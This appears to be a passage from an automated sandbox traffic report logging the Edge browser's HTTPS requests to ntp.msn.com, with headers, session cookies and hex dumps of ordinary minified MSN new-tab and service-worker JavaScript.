2025-01-09 13:56:18 UTC	689	IN	Data Raw: 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 64 69 72 3d 22 6c 74 72 22 20 3e 0d 0a 3c 68 65 61 64 20 64 61 74 61 2d 69 6e 66 6f 3d 22 66 3a 6d 73 6e 61 6c 6c 65 78 70 75 73 65 72 73 2c 70 72 67 2d 73 70 2d 6c 69 76 65 61 70 69 2c 70 72 67 2d 66 69 6e 2d 63 6f 6d 70 6f 66 2c 70 72 67 2d 66 69 6e 2d 68 70 6f 66 6c 69 6f 2c 70 72 67 2d 66 69 6e 2d 70 6f 66 6c 69 6f 2c 70 72 67 2d 31 73 77 2d 63 63 2d 63 61 6c 66 65 65 64 69 63 2c 63 2d 70 72 67 2d 6d 73 6e 2d 73 62 69 64 6d 2c 31 73 2d 70 6e 70 66 65 64 6c 6f 63 63 66 2c 70 6e 70 77 78 65 78 70 69 72 65 2d 63 2c 62 69 6e 67 5f 76 32 5f 73 63 6f 70 65 2c 70 72 67 2d 31 73 77 2d 73 61 2d 63 61 70 63 6f 6e 66 32 74 33 2c 70 72 67 2d 31 73 77 2d 73 61 2d 73 70 37 2d 74 32 2c Data Ascii: html><html lang="en-us" dir="ltr" ><head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-1sw-cc-calfeedic,c-prg-msn-sbidm,1s-pnpfedloccf,pnpwxexpire-c,bing_v2_scope,prg-1sw-sa-capconf2t3,prg-1sw-sa-sp7-t2,
2025-01-09 13:56:18 UTC	436	IN	Data Raw: 67 32 2d 65 76 6c 63 74 33 2c 70 72 67 2d 31 73 77 2d 62 67 2d 70 32 2c 70 72 67 2d 31 73 77 2d 63 6d 65 76 6c 74 2c 70 72 67 2d 70 32 2d 74 66 2d 62 64 67 70 76 2d 61 69 2c 70 72 67 2d 70 72 32 2d 66 69 65 70 6c 63 2c 70 72 67 2d 70 72 32 2d 74 72 66 2d 72 68 69 67 68 69 6d 70 2c 70 72 67 2d 70 72 32 2d 77 78 65 76 6f 6c 6e 6f 74 69 2c 70 72 67 2d 75 70 73 61 69 70 2d 77 31 2d 74 2c 70 72 67 2d 31 73 77 2d 73 61 67 65 72 76 75 6e 69 33 61 2c 70 72 67 2d 72 65 76 69 2d 6e 6f 63 61 63 68 65 2c 31 73 2d 72 70 73 73 65 63 61 75 74 68 74 2c 6a 6a 5f 66 61 63 5f 74 2c 70 72 67 2d 63 67 70 32 2d 68 6f 74 74 33 2c 31 73 2d 63 67 2d 70 32 68 6f 74 33 2c 70 72 67 2d 31 73 77 2d 64 61 69 6c 79 70 6f 70 2c 70 72 67 2d 70 72 32 2d 74 72 65 6e 64 73 2d 74 31 2c 63 68 Data Ascii: g2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,prg-1sw-sagervuni3a,prg-revi-nocache,1s-rpssecautht,jj_fac_t,prg-cgp2-hott3,1s-cg-p2hot3,prg-1sw-dailypop,prg-pr2-trends-t1,ch
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 74 76 32 64 62 2c 31 73 2d 73 68 70 2d 72 63 2d 74 65 2d 75 76 32 74 65 72 61 75 2c 70 72 67 2d 73 68 2d 6c 6f 77 69 6e 76 31 2c 70 72 67 2d 73 68 2d 6c 6f 77 69 6e 76 2c 70 72 67 2d 77 78 2d 64 68 67 72 64 2d 63 2c 70 72 67 2d 73 68 2d 64 65 61 6c 73 64 61 79 70 64 70 2c 70 72 67 2d 73 68 2d 72 6d 69 74 6d 6c 6e 6b 2c 6e 6f 70 69 6e 67 6c 61 6e 63 65 63 61 72 64 69 74 2c 70 72 67 2d 63 67 2d 69 6e 67 61 6d 65 73 2d 78 6e 2d 61 64 73 2c 70 72 67 2d 63 67 2d 69 6e 2d 67 6d 2d 78 6e 2d 61 64 73 2c 70 72 67 2d 31 73 2d 77 6f 72 6b 69 64 2c 31 73 2d 6d 78 72 2d 6e 74 70 70 61 67 65 2c 31 73 2d 6d 78 72 2d 70 32 70 61 67 65 2c 70 72 67 2d 31 73 77 2d 63 6c 61 72 69 2c 70 72 67 2d 31 73 77 2d 70 72 32 63 6c 61 72 69 74 79 2c 70 72 67 2d 63 67 2d 6e 6f 74 66 2d Data Ascii: tv2db,1s-shp-rc-te-uv2terau,prg-sh-lowinv1,prg-sh-lowinv,prg-wx-dhgrd-c,prg-sh-dealsdaypdp,prg-sh-rmitmlnk,nopinglancecardit,prg-cg-ingames-xn-ads,prg-cg-in-gm-xn-ads,prg-1s-workid,1s-mxr-ntppage,1s-mxr-p2page,prg-1sw-clari,prg-1sw-pr2clarity,prg-cg-notf-
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 6f 74 3b 3a 26 71 75 6f 74 3b 6c 61 74 65 73 74 26 71 75 6f 74 3b 7d 2c 20 26 71 75 6f 74 3b 6f 73 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 77 69 6e 64 6f 77 73 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 62 72 6f 77 73 65 72 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 62 72 6f 77 73 65 72 54 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 64 67 65 43 68 72 6f 6d 69 75 6d 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 76 65 72 73 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 31 31 37 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 69 73 6d 6f 62 69 6c 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 66 61 6c 73 65 26 71 75 6f 74 3b 7d 2c 20 26 71 75 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 26 71 75 6f 74 3b 2c 20 26 Data Ascii: ot;:"latest"}, "os":"windows", "browser":{"browserType":"edgeChromium", "version":"117", "ismobile":"false"}, "domain":"ntp.msn.com", &
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 28 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 7d 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 29 7b 63 6f 6e 73 74 20 65 3d 6e 2e 65 2c 74 3d 7b 7d 3b 6e 2e 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 65 28 6f 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 69 3d 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 74 5b 6f 5d 3a 32 3b 69 66 28 31 3d 3d 3d 69 26 26 28 6e 2e 70 3d 6e 2e 70 2e 72 65 70 6c 61 63 65 28 22 2f 61 73 73 65 74 73 2e 22 2c 22 2f 61 73 73 65 74 73 32 2e 22 29 29 2c 69 3c 31 29 74 68 72 6f 77 20 65 3b 72 65 74 75 72 6e 20 6e 65 Data Ascii: ()}catch(e){if("object"==typeof window)return window}}(),function(){if(void 0!==n){const e=n.e,t={};n.e=function(o){return e(o).catch((function(e){const i=t.hasOwnProperty(o)?t[o]:2;if(1===i&&(n.p=n.p.replace("/assets.","/assets2.")),i<1)throw e;return ne
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 65 63 61 74 65 64 3d 31 5d 3d 22 44 65 70 72 65 63 61 74 65 64 22 2c 65 5b 65 2e 48 69 67 68 49 6d 70 61 63 74 3d 32 5d 3d 22 48 69 67 68 49 6d 70 61 63 74 22 2c 65 5b 65 2e 43 72 69 74 69 63 61 6c 3d 33 5d 3d 22 43 72 69 74 69 63 61 6c 22 7d 28 42 7c 7c 28 42 3d 7b 7d 29 29 3b 63 6f 6e 73 74 20 24 3d 6e 65 77 20 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 3d 32 30 29 7b 74 68 69 73 2e 6d 61 78 4c 65 6e 67 74 68 3d 65 2c 74 68 69 73 2e 6c 69 73 74 3d 5b 5d 7d 70 75 73 68 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 2e 70 75 73 68 28 65 29 2c 74 68 69 73 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 3e 74 68 69 73 2e 6d 61 78 4c 65 6e 67 74 68 26 26 74 68 69 73 2e 6c 69 73 74 2e 73 68 69 66 74 28 29 7d 67 65 74 20 64 61 74 61 28 29 7b 72 65 74 75 72 6e 20 74 Data Ascii: ecated=1]="Deprecated",e[e.HighImpact=2]="HighImpact",e[e.Critical=3]="Critical"}(B\|\|(B={}));const $=new class{constructor(e=20){this.maxLength=e,this.list=[]}push(e){this.list.push(e),this.list.length>this.maxLength&&this.list.shift()}get data(){return t
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 63 61 6c 3a 22 68 6f 6d 65 70 61 67 65 22 2c 63 61 74 65 67 6f 72 79 3a 22 22 2c 69 64 3a 22 22 2c 64 6f 6d 61 69 6e 49 64 3a 22 31 33 30 34 31 22 2c 74 69 74 6c 65 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3f 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3a 22 22 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 65 29 7b 6c 65 74 20 74 3d 65 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 77 69 6e 64 6f 77 73 73 68 65 6c 6c 68 70 22 3a 74 3d 22 64 68 70 22 3b 62 72 65 61 6b 3b 63 61 73 65 22 76 69 64 65 6f 22 3a 74 3d 22 77 61 74 63 68 22 3b 62 72 65 61 6b 3b 63 61 73 65 22 45 64 67 65 4d 6f 62 69 6c 65 22 3a 74 3d 49 28 29 3f 22 6e 74 70 22 3a 22 64 68 70 22 7d 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 56 3b 66 75 6e 63 74 Data Ascii: cal:"homepage",category:"",id:"",domainId:"13041",title:"undefined"!=typeof document?document.title:""}};function J(e){let t=e;switch(e){case"windowsshellhp":t="dhp";break;case"video":t="watch";break;case"EdgeMobile":t=I()?"ntp":"dhp"}return t}let V;funct
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 63 3d 31 5d 3d 22 42 61 73 69 63 22 2c 65 5b 65 2e 41 64 76 61 6e 63 65 64 3d 32 5d 3d 22 41 64 76 61 6e 63 65 64 22 2c 65 5b 65 2e 50 72 65 6d 69 75 6d 3d 33 5d 3d 22 50 72 65 6d 69 75 6d 22 7d 28 45 65 7c 7c 28 45 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 49 6e 69 74 3d 22 69 6e 69 74 22 2c 65 2e 43 6f 6e 66 69 67 3d 22 63 6f 6e 66 69 67 22 2c 65 2e 54 61 72 67 65 74 65 64 3d 22 74 61 72 67 65 74 65 64 22 2c 65 2e 53 74 69 63 6b 79 3d 22 73 74 69 63 6b 79 22 2c 65 2e 4e 6f 53 74 69 63 6b 79 3d 22 6e 6f 5f 73 74 69 63 6b 79 22 2c 65 2e 41 64 6d 69 6e 3d 22 61 64 6d 69 6e 22 2c 65 2e 46 6f 72 63 65 64 3d 22 66 6f 72 63 65 64 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 7d 28 43 65 7c 7c 28 43 65 3d 7b 7d 29 29 3b 6e 65 77 Data Ascii: c=1]="Basic",e[e.Advanced=2]="Advanced",e[e.Premium=3]="Premium"}(Ee\|\|(Ee={})),function(e){e.Init="init",e.Config="config",e.Targeted="targeted",e.Sticky="sticky",e.NoSticky="no_sticky",e.Admin="admin",e.Forced="forced",e.Manual="manual"}(Ce\|\|(Ce={}));new
2025-01-09 13:56:18 UTC	4096	IN	Data Raw: 3d 22 75 78 73 77 69 74 63 68 22 2c 65 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6a 65 28 29 3b 72 65 74 75 72 6e 20 65 26 26 22 31 22 3d 3d 3d 65 2e 67 65 74 49 74 65 6d 28 7a 65 29 7c 7c 64 28 29 26 26 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 26 26 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 69 6e 63 6c 75 64 65 73 28 60 24 7b 7a 65 7d 3d 31 60 29 7d 29 29 3b 63 6f 6e 73 74 20 74 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 28 29 3b 72 65 74 75 72 6e 20 65 26 26 21 21 65 2e 67 65 74 49 74 65 6d 28 58 65 29 7d 29 29 3b 63 6f 6e 73 74 20 6e 74 3d 75 28 Data Ascii: ="uxswitch",et=u((()=>{const e=je();return e&&"1"===e.getItem(ze)\|\|d()&&location.search&&location.search.includes(`${ze}=1`)}));const tt=u((()=>{const e=function(){try{return sessionStorage}catch(e){return null}}();return e&&!!e.getItem(Xe)}));const nt=u(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	50058	131.253.33.203	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:18 UTC	2070	OUT	GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1 Host: ntp.msn.com Connection: keep-alive Cache-Control: max-age=0 Accept: / Service-Worker: script User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":48,"imageId":"BB1msG4y","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}} Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: serviceworker Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; MUIDB=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=aa105f55-fe26-43b3-acff-a216f473aa9a; ai_session=CIHHYJi2caRpQYELrLG2Co\|1736430974303\|1736430974303; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z
2025-01-09 13:56:18 UTC	1435	IN	HTTP/1.1 200 OK Cache-Control: no-cache Transfer-Encoding: chunked Content-Type: application/javascript Content-MD5: 4h4pmCwrwxZnvMqZGCDn3w== Last-Modified: Thu, 09 Jan 2025 09:19:40 GMT ETag: 0x8DD308EBEEC7E61 Vary: Origin x-ms-request-id: 6cd098bc-f01e-0086-0d77-6296a6000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Akamai-Request-BC: [a=23.220.106.210,b=1020175259,c=g,n=US_VA_ASHBURN,o=20940] Server-Timing: clientrtt; dur=0, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.220.106.210 Akamai-Request-ID: 3ccea39b Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Service-Worker-Allowed: / report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Timing-Allow-Origin: * Akamai-GRN: 0.d26adc17.1736430978.3ccea39b X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 878187B477EA4BB19A8DDBC67FF41F26 Ref B: BL2AA2010202003 Ref C: 2025-01-09T13:56:18Z Date: Thu, 09 Jan 2025 13:56:18 GMT Connection: close
2025-01-09 13:56:18 UTC	2911	IN	Data Raw: 62 35 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3b 65 6c 73 65 7b 76 61 72 20 73 3d 74 28 29 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 73 29 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 3a 65 29 5b 6e 5d 3d 73 5b 6e 5d 7d 7d 28 73 65 6c 66 2c 28 28 29 3d 3e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 Data Ascii: b58!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict
2025-01-09 13:56:18 UTC	8200	IN	Data Raw: 32 30 30 30 0d 0a 65 6e 61 62 6c 65 53 74 61 74 69 63 4e 61 76 52 6f 75 74 69 6e 67 22 2c 65 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 41 64 73 52 6f 75 74 69 6e 67 3d 22 65 6e 61 62 6c 65 53 74 61 74 69 63 41 64 73 52 6f 75 74 69 6e 67 22 2c 65 2e 63 6f 6d 6d 6f 6e 48 61 73 68 3d 22 63 6f 6d 6d 6f 6e 48 61 73 68 22 2c 65 2e 76 65 6e 64 6f 72 73 48 61 73 68 3d 22 76 65 6e 64 6f 72 73 48 61 73 68 22 2c 65 2e 65 78 70 65 72 69 65 6e 63 65 48 61 73 68 3d 22 65 78 70 65 72 69 65 6e 63 65 48 61 73 68 22 2c 65 2e 6d 69 63 72 6f 73 6f 66 74 48 61 73 68 3d 22 6d 69 63 72 6f 73 6f 66 74 48 61 73 68 22 2c 65 2e 65 6e 61 62 6c 65 43 6f 72 65 42 75 6e 64 6c 65 50 72 65 63 61 63 68 65 3d 22 65 6e 61 62 6c 65 43 6f 72 65 42 75 6e 64 6c 65 50 72 65 63 61 63 68 65 22 2c 65 Data Ascii: 2000enableStaticNavRouting",e.enableStaticAdsRouting="enableStaticAdsRouting",e.commonHash="commonHash",e.vendorsHash="vendorsHash",e.experienceHash="experienceHash",e.microsoftHash="microsoftHash",e.enableCoreBundlePrecache="enableCoreBundlePrecache",e
2025-01-09 13:56:18 UTC	4045	IN	Data Raw: 66 63 36 0d 0a 61 74 63 68 28 74 2c 6e 29 7d 28 75 2c 72 2e 63 6c 6f 6e 65 28 29 2c 5b 22 5f 5f 57 42 5f 52 45 56 49 53 49 4f 4e 5f 5f 22 5d 2c 68 29 3a 6e 75 6c 6c 3b 74 72 79 7b 61 77 61 69 74 20 75 2e 70 75 74 28 72 2c 64 3f 6f 2e 63 6c 6f 6e 65 28 29 3a 6f 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 74 68 72 6f 77 22 51 75 6f 74 61 45 78 63 65 65 64 65 64 45 72 72 6f 72 22 3d 3d 3d 65 2e 6e 61 6d 65 26 26 61 77 61 69 74 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 74 29 61 77 61 69 74 20 65 28 29 7d 28 29 2c 65 7d 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 74 68 69 73 2e 69 74 65 72 61 74 65 43 61 6c 6c 62 61 63 6b 73 28 22 63 61 63 68 65 44 Data Ascii: fc6atch(t,n)}(u,r.clone(),["__WB_REVISION__"],h):null;try{await u.put(r,d?o.clone():o)}catch(e){if(e instanceof Error)throw"QuotaExceededError"===e.name&&await async function(){for(const e of t)await e()}(),e}for(const e of this.iterateCallbacks("cacheD
2025-01-09 13:56:18 UTC	8200	IN	Data Raw: 32 30 30 30 0d 0a 6f 6d 65 28 28 65 3d 3e 22 63 61 63 68 65 57 69 6c 6c 55 70 64 61 74 65 22 69 6e 20 65 29 29 7c 7c 74 68 69 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 73 68 69 66 74 28 44 29 7d 61 73 79 6e 63 20 5f 68 61 6e 64 6c 65 28 74 2c 73 29 7b 63 6f 6e 73 74 20 6e 3d 73 2e 66 65 74 63 68 41 6e 64 43 61 63 68 65 50 75 74 28 74 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 7d 29 29 3b 6c 65 74 20 61 2c 72 3d 61 77 61 69 74 20 73 2e 63 61 63 68 65 4d 61 74 63 68 28 74 29 3b 69 66 28 72 29 3b 65 6c 73 65 20 74 72 79 7b 72 3d 61 77 61 69 74 20 6e 7d 63 61 74 63 68 28 65 29 7b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 28 61 3d 65 29 7d 69 66 28 21 72 29 74 68 72 6f 77 20 6e 65 77 20 65 28 22 6e 6f 2d 72 65 73 70 6f 6e 73 65 22 2c 7b 75 72 6c 3a Data Ascii: 2000ome((e=>"cacheWillUpdate"in e))\|\|this.plugins.unshift(D)}async _handle(t,s){const n=s.fetchAndCachePut(t).catch((()=>{}));let a,r=await s.cacheMatch(t);if(r);else try{r=await n}catch(e){e instanceof Error&&(a=e)}if(!r)throw new e("no-response",{url:
2025-01-09 13:56:18 UTC	1257	IN	Data Raw: 34 65 32 0d 0a 61 2d 63 6f 6e 6e 65 63 74 6f 72 2e 22 2c 22 2f 77 65 61 74 68 65 72 2d 63 61 72 64 2d 77 63 2e 22 2c 22 2f 77 65 6c 63 6f 6d 65 47 72 65 65 74 69 6e 67 4c 69 67 68 74 2e 22 2c 22 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 78 6d 6c 62 75 69 6c 64 65 72 32 5f 6c 69 62 5f 78 6d 6c 62 75 69 6c 64 65 72 32 5f 6d 69 6e 5f 6a 73 2e 22 5d 2c 68 65 3d 5b 22 2f 62 61 63 6b 67 72 6f 75 6e 64 2d 67 61 6c 6c 65 72 79 2e 22 2c 22 2f 63 61 72 64 2d 61 63 74 69 6f 6e 73 2d 77 63 2e 22 2c 22 2f 63 68 61 6e 6e 65 6c 2d 64 61 74 61 2d 63 6f 6e 6e 65 63 74 6f 72 2e 22 2c 22 2f 63 68 61 6e 6e 65 6c 2d 73 74 6f 72 65 2e 22 2c 22 2f 63 6f 64 65 78 2d 62 69 6e 67 2d 63 68 61 74 2e 22 2c 22 2f 63 6f 6d 6d 6f 6e 2e 22 2c 22 2f 63 6f 6d 6d 6f 6e 2d 63 73 63 6f 72 65 Data Ascii: 4e2a-connector.","/weather-card-wc.","/welcomeGreetingLight.","/node_modules_xmlbuilder2_lib_xmlbuilder2_min_js."],he=["/background-gallery.","/card-actions-wc.","/channel-data-connector.","/channel-store.","/codex-bing-chat.","/common.","/common-cscore
2025-01-09 13:56:18 UTC	4043	IN	Data Raw: 66 63 34 0d 0a 32 5f 6d 69 6e 5f 6a 73 2e 22 5d 2c 75 65 3d 5b 22 2f 77 69 64 67 65 74 73 2d 72 65 67 69 6f 6e 2e 22 2c 22 2f 73 70 6f 72 74 73 2d 69 6e 66 6f 2e 22 2c 22 2f 73 70 6f 72 74 73 2d 6d 61 74 63 68 2d 6c 69 73 74 2e 22 2c 22 2f 73 70 6f 72 74 73 2d 69 6e 66 6f 2d 75 74 69 6c 73 2e 22 2c 22 2f 6d 6f 6e 65 79 2d 69 6e 66 6f 2e 22 2c 22 2f 6d 6f 6e 65 79 2d 71 75 6f 74 65 2d 76 65 72 74 69 63 61 6c 2d 77 61 74 63 68 6c 69 73 74 2e 22 2c 22 2f 6d 6f 6e 65 79 2d 69 6e 66 6f 2d 73 65 72 76 69 63 65 2e 22 2c 22 2f 74 72 61 66 66 69 63 2d 63 61 72 64 2d 77 63 2e 22 5d 3b 6c 65 74 20 64 65 3b 66 75 6e 63 74 69 6f 6e 20 70 65 28 29 7b 72 65 74 75 72 6e 20 64 65 7d 76 61 72 20 67 65 3d 2f 5c 73 2f 3b 76 61 72 20 66 65 3d 2f 5e 5c 73 2b 2f 3b 63 6f 6e 73 Data Ascii: fc42_min_js."],ue=["/widgets-region.","/sports-info.","/sports-match-list.","/sports-info-utils.","/money-info.","/money-quote-vertical-watchlist.","/money-info-service.","/traffic-card-wc."];let de;function pe(){return de}var ge=/\s/;var fe=/^\s+/;cons
2025-01-09 13:56:18 UTC	8200	IN	Data Raw: 32 30 30 30 0d 0a 6f 3d 63 2e 72 65 70 6c 61 63 65 28 22 73 70 61 6c 69 6e 6b 3a 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 2f 64 65 62 75 67 22 2c 22 22 29 29 3b 63 6f 6e 73 74 20 68 3d 6f 7c 7c 22 6c 61 74 65 73 74 22 2c 75 3d 65 2e 6d 61 70 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 73 3d 65 2e 75 72 6c 2e 73 70 6c 69 74 28 22 2f 22 29 3b 72 65 74 75 72 6e 20 73 5b 34 5d 3d 68 2c 65 2e 75 72 6c 3d 60 24 7b 74 7d 24 7b 73 2e 6a 6f 69 6e 28 22 2f 22 29 7d 60 2c 65 7d 29 29 2c 64 3d 6e 7c 7c 5b 5d 2c 70 3d 73 7c 7c 5b 5d 3b 6c 65 74 20 67 3d 75 3b 72 65 74 75 72 6e 20 70 2e 6c 65 6e 67 74 68 26 26 28 67 3d 75 2e 66 69 6c 74 65 72 28 28 65 3d 3e 70 2e 73 6f 6d 65 28 28 74 3d 3e 65 2e 75 72 6c 2e 69 6e 63 6c 75 64 65 73 28 74 29 29 29 29 29 29 2c 64 2e 6c 65 6e Data Ascii: 2000o=c.replace("spalink:","").replace("/debug",""));const h=o\|\|"latest",u=e.map((e=>{const s=e.url.split("/");return s[4]=h,e.url=`${t}${s.join("/")}`,e})),d=n\|\|[],p=s\|\|[];let g=u;return p.length&&(g=u.filter((e=>p.some((t=>e.url.includes(t)))))),d.len
